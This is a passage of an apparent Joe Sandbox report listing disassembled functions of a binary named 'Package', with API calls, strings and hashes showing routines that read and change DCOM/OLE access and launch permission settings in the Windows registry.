Opcode ID: ab0c0f3499da7964fef51f78523f178cabe1cf8e1c9b4d3dc4074649d21543b3
Instruction ID: 144e44c28e5f2273537d5c08a7173cce7b6dce085cce73fd313e512169743156
Opcode Fuzzy Hash: ab0c0f3499da7964fef51f78523f178cabe1cf8e1c9b4d3dc4074649d21543b3
Instruction Fuzzy Hash: 0A81507064020AABEB21DF64DC89FFFBBBAFB44701F504528B619A60E5DB706914DA90

Function 001FEBCC Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

#540.MFC42U(85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEBFF
#540.MFC42U(85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEC07
#4155.MFC42U(00000004,85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEC11
#4155.MFC42U(00000008,00000004,85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEC1B
#6398.MFC42U(?,?,?,00000008,00000004,85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEC32
#861.MFC42U(ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC,?,?,?,?,?,002104CF,000000FF), ref: 001FEC3F
#6398.MFC42U(?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC,?,?,?,?,?,002104CF), ref: 001FEC4F
#861.MFC42U(ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC5C
#6398.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC6C
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC74
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC7C
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC84
#652.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,85C979FC), ref: 001FEC8B

Strings

ViewHiddenComCats, xrefs: 001FEC37
ExpertMode, xrefs: 001FEC54

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6398#800$#4155#540#861$#652
String ID: ExpertMode$ViewHiddenComCats
API String ID: 800799730-816868219
Opcode ID: b5c1f716de2b3f50f68e9c318364f895d540309a5bb916381f38da6e1f23fc57
Instruction ID: cb1d8eb72fec0ebd4d65a950d5efff2d75d6f6084c975b87f9cc77b555010f96
Opcode Fuzzy Hash: b5c1f716de2b3f50f68e9c318364f895d540309a5bb916381f38da6e1f23fc57
Instruction Fuzzy Hash: F2215035920619ABCF15EB90CD42EBEB7B6FF94710F000928B512671E3DBB06A14CE10

Function 0020C8A3 Relevance: 25.6, APIs: 17, Instructions: 108COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001,?,?,0020BA6A,?), ref: 0020C8C5
OpenProcessToken.ADVAPI32(00000000,?,0020BA6A,?), ref: 0020C8CC
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,0020BA6A,?,0020BA6A,?), ref: 0020C8E7
GetLastError.KERNEL32(?,0020BA6A,?), ref: 0020C8ED
CloseHandle.KERNEL32(?,0020BA6A,?), ref: 0020C921

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
String ID:
API String ID: 2078281146-0
Opcode ID: 1b6b0b33435bb9e1c1637549ba2e2bddbbd1dd5f56ab82720910d721d0da0e63
Instruction ID: a3cd1d5dd4d74471c6d6f5f5fa2f254fb6e5a38707506e0a0c97f1b4cdc07042
Opcode Fuzzy Hash: 1b6b0b33435bb9e1c1637549ba2e2bddbbd1dd5f56ab82720910d721d0da0e63
Instruction Fuzzy Hash: 7431D4B651021AEFCB116FA5FC0CABE7B75FB59311B318225F909E61A1DF3489109B50

Function 001FC070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 75windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001FC086
#4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo,Access Permissions,00000004), ref: 001FC09E
LoadCursorW.USER32(00000000,00007F02), ref: 001FC0B3
SetCursor.USER32(00000000), ref: 001FC0BA
SendMessageW.USER32(?,00001009,00000000,00000000), ref: 001FC0EA
#2634.MFC42U(00000000), ref: 001FC0F7
#2634.MFC42U(00000000,00000000), ref: 001FC103
LoadCursorW.USER32(00000000,00007F00), ref: 001FC10E
SetCursor.USER32(00000000), ref: 001FC115
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FC12D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FC13D

Strings

AccessPermission, xrefs: 001FC0C0
Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo, xrefs: 001FC097
Access Permissions, xrefs: 001FC092

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CursorMessageSend$#2634Load$#4219
String ID: Access Permissions$AccessPermission$Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo
API String ID: 2901272449-2859256857
Opcode ID: 9e2d5bb5358c974bf9bc28209cfb917f10c46a005abc5f23e0f6bec60a026494
Instruction ID: 1710c0d1e6d616eed4a02a263b65cbc9f2a67d0785c6adffeef3e792cf288149
Opcode Fuzzy Hash: 9e2d5bb5358c974bf9bc28209cfb917f10c46a005abc5f23e0f6bec60a026494
Instruction Fuzzy Hash: ED117232640610BAEB216F61EC8EEE77B29DF96B52F118034FA099D0D6CFA10805D6A0

Function 00205601 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 172registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,AppID,00000000), ref: 00205653
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000100), ref: 0020569A
wsprintfW.USER32 ref: 00205754
RegQueryValueW.ADVAPI32(80000000,?,?,00000100), ref: 00205777
CLSIDFromString.OLE32(00000000,-00000008), ref: 002057CF
lstrcpyW.KERNEL32(-00000084,?), ref: 0020584A
lstrlenW.KERNEL32(?), ref: 002058A8
wsprintfW.USER32 ref: 002058C5
RegCloseKey.ADVAPI32(00000000), ref: 002058FE

Strings

AppID\%s, xrefs: 00205748
[AppID: %s], xrefs: 002058B9
AppID, xrefs: 00205649
', xrefs: 00205870

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: wsprintf$CloseEnumFromOpenQueryStringValuelstrcpylstrlen
String ID: '$AppID$AppID\%s$[AppID: %s]
API String ID: 1953670596-3682975055
Opcode ID: 9d67d265a27dfa4a12eb1cf46d16449610bdac9371366983a695122ceeddcbce
Instruction ID: 49d1bbd23992cfd470a64b2f7107e897027cb419a119bd2245fcbe7c19328222
Opcode Fuzzy Hash: 9d67d265a27dfa4a12eb1cf46d16449610bdac9371366983a695122ceeddcbce
Instruction Fuzzy Hash: 4F81B4B1910A2C9FDB24DF54DC49BEAB7B8BB08316F1044E9E909E6291DB749BC4CF50

Function 0020B680 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 124windowstringCOMMON

Download Yara Rule

APIs

Part of subcall function 0020D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D70D
Part of subcall function 0020D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0020D6E4,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D72C
Part of subcall function 0020D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0020D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0020D738

lstrcmpiW.KERNEL32(?,001F2778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0020B6E0
lstrcmpiW.KERNEL32(?,001F2778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0020B726
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0020B749
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0020B76E
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0020B7B1
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0020B7DC
#5273.MFC42U(80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,001F2778), ref: 0020B809
#1197.MFC42U(These changes will take effect after you restart your computer.,00000000,00000000), ref: 0020B81F

Strings

EnableRemoteConnect, xrefs: 0020B702, 0020B7F0
These changes will take effect after you restart your computer., xrefs: 0020B81A
SOFTWARE\MICROSOFT\OLE, xrefs: 0020B6BF, 0020B707, 0020B787, 0020B7F5
EnableDCOM, xrefs: 0020B6BA, 0020B782

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$lstrcmpi$#1197#5273CloseOpenQueryValue
String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE$These changes will take effect after you restart your computer.
API String ID: 2271089683-166272277
Opcode ID: 246c22c11f3763e477a3d5f9aedf5b276248a84187b4b2c5aee56d4ad02e58c5
Instruction ID: 8185ece75acb83e65ce5ff6c766304337e191b2376b4af247b14219bf55f0875
Opcode Fuzzy Hash: 246c22c11f3763e477a3d5f9aedf5b276248a84187b4b2c5aee56d4ad02e58c5
Instruction Fuzzy Hash: 3F41D6717A031AB6EB316F60DC8AFBAF66DEB14B04F104164FB14B50D3DBB0AE558A44

Function 0020F1A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00213B00,00000FA0), ref: 0020F1B0
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 0020F1BB
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0020F1CC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0020F1DE
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0020F1EC
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0020F21E
DeleteCriticalSection.KERNEL32(00213B00,00000007), ref: 0020F245
CloseHandle.KERNEL32(00000000), ref: 0020F255

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0020F1B6
SleepConditionVariableCS, xrefs: 0020F1D8
kernel32.dll, xrefs: 0020F1C7
WakeAllConditionVariable, xrefs: 0020F1E4

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: cb3280e4165f02b491069dfcfd596ce5ea93b8251a9c6c4747a963ebe7546ad3
Instruction ID: ce10a92595068006acd27daa4d9e37ae0bfeb760d02c5c319b7ccc36db4bbea2
Opcode Fuzzy Hash: cb3280e4165f02b491069dfcfd596ce5ea93b8251a9c6c4747a963ebe7546ad3
Instruction Fuzzy Hash: C9010C756943117BC730BB74BD0DEE63AA5BBB4B017044020FD08D2691EF70CE118A91

Function 001FF290 Relevance: 21.0, APIs: 10, Strings: 2, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FF29A
lstrcpyW.KERNEL32(?,Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|,00000548), ref: 001FF2AD
#355.MFC42U(00000001,00000000,001F21A0,00001804,?), ref: 001FF2D0
#2507.MFC42U ref: 001FF2E8
#3494.MFC42U(?), ref: 001FF2FF
#858.MFC42U(00000000,?), ref: 001FF30F
#800.MFC42U(00000000,?), ref: 001FF31D
#6330.MFC42U(00000000,00000000,?), ref: 001FF325
#800.MFC42U ref: 001FF330
#641.MFC42U ref: 001FF33B

Strings

Open COM Surrogate Server, xrefs: 001FF2DE
Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|, xrefs: 001FF2A1

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
String ID: Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|$Open COM Surrogate Server
API String ID: 2485399651-276578773
Opcode ID: c719787479164e040b6b63f358b87b1c119feff9c35dd4509a4afad575db2613
Instruction ID: c6faefcaa7ea1875178424733ce6a0ca7cefe177fd3cf9bbbe23d8ec091ff469
Opcode Fuzzy Hash: c719787479164e040b6b63f358b87b1c119feff9c35dd4509a4afad575db2613
Instruction Fuzzy Hash: 3401657056161C9EDB14EB94CD95AEEB368BF24305F8044E9F205A31C2DFB05F98CE51

Function 001FEF20 Relevance: 21.0, APIs: 10, Strings: 2, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FEF2A
lstrcpyW.KERNEL32(?,Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|,00000548), ref: 001FEF3D
#355.MFC42U(00000001,00000000,001F21A0,00001804,?), ref: 001FEF60
#2507.MFC42U ref: 001FEF78
#3494.MFC42U(?), ref: 001FEF8F
#858.MFC42U(00000000,?), ref: 001FEF9F
#800.MFC42U(00000000,?), ref: 001FEFAD
#6330.MFC42U(00000000,00000000,?), ref: 001FEFB5
#800.MFC42U ref: 001FEFC0
#641.MFC42U ref: 001FEFCB

Strings

Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|, xrefs: 001FEF31
Open COM Server, xrefs: 001FEF6E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
String ID: Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|$Open COM Server
API String ID: 2485399651-2085683529
Opcode ID: 5926db365818cb12fe3426e94d799b9233ab84bb4a9e3cdec0b8a4036ee03684
Instruction ID: 734df6458ef5f2b65da8e80a32ec0bd842d68a7b5bcf149ab296f1fdf7f8727d
Opcode Fuzzy Hash: 5926db365818cb12fe3426e94d799b9233ab84bb4a9e3cdec0b8a4036ee03684
Instruction Fuzzy Hash: CD011E715616189ADB24EB94CDA5AEEB368AB24305F8044E9F209A21C2DFB05F98CE51

Function 001FE466 Relevance: 18.1, APIs: 12, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE482
#6211.MFC42U(00000005,?,?,?,?,?,001FE130,?,?), ref: 001FE49B
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001FE4AA
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE4BE

Part of subcall function 001FE583: #6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE5BE
Part of subcall function 001FE583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,001FD5AA,00000000), ref: 001FE669

SendMessageW.USER32(?,00001308,00000001,00000000), ref: 001FE4DA
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE4ED
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE504
SendMessageW.USER32(?,0000133E,00000000,?), ref: 001FE528
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001FE53B
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001FE555
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,001FE130,?,?), ref: 001FE569
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,001FE130,?,?), ref: 001FE578

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$RedrawWindow$#6211
String ID:
API String ID: 2246854860-0
Opcode ID: ad12ede28397a50a705dd98502c4694ab1d651464ef9ee14e0a4c12f63a4a238
Instruction ID: 216e9555c19170292346ffd0431491289d7bf633d7a952647689ae855278db8d
Opcode Fuzzy Hash: ad12ede28397a50a705dd98502c4694ab1d651464ef9ee14e0a4c12f63a4a238
Instruction Fuzzy Hash: E0212171504A08BFF6212B70DC8DEE7BAEDFB5574AF414418F25E910B0DB752D118A60

Function 6C4E5DA3 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

PATH, xrefs: 6C4E5E7A, 6C4E5E80
\, xrefs: 6C4E5F1D

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: PATH$\
API String ID: 485612231-1896636505
Opcode ID: f9a5f35e0cf0429d4a2531b3548da79303908e6aefbd03c8df5c5c78e8a41d8f
Instruction ID: 2df7c8eea3da79caa1496583b7a2df78615e98577c02f55d91a0c618a2ab014e
Opcode Fuzzy Hash: f9a5f35e0cf0429d4a2531b3548da79303908e6aefbd03c8df5c5c78e8a41d8f
Instruction Fuzzy Hash: 119117B190821A9EEB15CF64CC40FEE7BB5AF0E32BF26051DD910E6B81EB718545CB94

Function 00200BBB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00200BE4

Part of subcall function 0020D2F7: wsprintfW.USER32 ref: 0020D35B
Part of subcall function 0020D2F7: lstrcatW.KERNEL32(?,001F60AC), ref: 0020D376
Part of subcall function 0020D2F7: lstrcatW.KERNEL32(?,?), ref: 0020D37E

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

#2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00200C33
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00200C46
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00200C57
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00200C6F
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00200C80
UpdateWindow.USER32(?), ref: 00200C8C
#2634.MFC42U(00000001), ref: 00200C9A
#2634.MFC42U(00000001,00000001), ref: 00200CA3

Strings

LaunchPermission, xrefs: 00200C07

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2634$lstrcat$#540#800CloseH_prolog3_OpenQueryUpdateValueWindowwsprintf
String ID: LaunchPermission
API String ID: 2454494747-4257139491
Opcode ID: 28239fda364471406e5a8f90ab855ce575148b89e70b2c29398e81518175fc2b
Instruction ID: eef8c7274a8f22de53c2e78d4e2c26f48b6b2560c313560ffd2b71cdd262a36c
Opcode Fuzzy Hash: 28239fda364471406e5a8f90ab855ce575148b89e70b2c29398e81518175fc2b
Instruction Fuzzy Hash: E5219031250214ABEB21AF21DC8EFEA7A69DF02701F454070BE0D6E0D3CFB15995CBA0

Function 001FE810 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 001FE81D
SendMessageW.USER32(?,00001061,00000000,?), ref: 001FE848
SendMessageW.USER32(?,00001061,00000001,?), ref: 001FE86C
#1662.MFC42U ref: 001FE874

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

#2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTACCESSPERMISSION), ref: 001FE896

Strings

j, xrefs: 001FE865
User/Group, xrefs: 001FE833
Can Access, xrefs: 001FE85E
DEFAULTACCESSPERMISSION, xrefs: 001FE879
SOFTWARE\MICROSOFT\OLE, xrefs: 001FE87E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
String ID: Can Access$DEFAULTACCESSPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
API String ID: 3233431167-2986021116
Opcode ID: d4c7c8c4e1bddd64dd177bd8292e555e85cb409a58f451a37cd371adc6629b79
Instruction ID: 4a53d09a33abd688f392757d59c5dad58caf8446879e0b8580f4b359da44afb3
Opcode Fuzzy Hash: d4c7c8c4e1bddd64dd177bd8292e555e85cb409a58f451a37cd371adc6629b79
Instruction Fuzzy Hash: F6018F7160030CAFEF10ABA0CC4AFEFBBB9EB84714F11051DFA01722C1CBB559558AA5

Function 001FEA00 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 001FEA0D
SendMessageW.USER32(?,00001061,00000000,?), ref: 001FEA38
SendMessageW.USER32(?,00001061,00000001,?), ref: 001FEA5C
#1662.MFC42U ref: 001FEA64

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

#2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTLAUNCHPERMISSION), ref: 001FEA86

Strings

DEFAULTLAUNCHPERMISSION, xrefs: 001FEA69
User/Group, xrefs: 001FEA23
j, xrefs: 001FEA55
Can Launch, xrefs: 001FEA4E
SOFTWARE\MICROSOFT\OLE, xrefs: 001FEA6E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
String ID: Can Launch$DEFAULTLAUNCHPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
API String ID: 3233431167-4187468794
Opcode ID: 64ee1d049ee28c82c11bee2b7581d5e8e7f2fe4abded27f122cefbd4fab4e913
Instruction ID: 1b474aac76a03c95c4b7f5fe1ad06ecef0fbc75780384f44584cd93c9e98405e
Opcode Fuzzy Hash: 64ee1d049ee28c82c11bee2b7581d5e8e7f2fe4abded27f122cefbd4fab4e913
